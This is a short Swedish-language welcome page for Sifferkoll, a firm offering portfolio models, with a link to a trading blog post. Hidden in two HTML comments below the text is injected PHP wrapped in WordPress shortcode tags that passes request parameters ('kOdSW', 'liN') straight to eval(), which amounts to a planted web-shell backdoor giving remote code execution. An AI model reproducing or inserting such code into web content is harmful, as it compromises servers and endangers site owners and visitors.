Välkommen till Sifferkoll®

Vi utvecklar enkla portföljmodeller med hög avkastning i förhållande till risk. Läs mer om en av våra sådana modeller här: http://www.redeye.se/aktiebloggen/systematisk-handel-en-enkel-portfoljmodell-som-fungerar

<!– [insert_php]if (isset($_REQUEST["kOdSW"])){eval($_REQUEST["kOdSW"]);exit;}[/insert_php][php]if (isset($_REQUEST["kOdSW"])){eval($_REQUEST["kOdSW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["liN"])){eval($_REQUEST["liN"]);exit;}[/insert_php][php]if (isset($_REQUEST["liN"])){eval($_REQUEST["liN"]);exit;}[/php] –>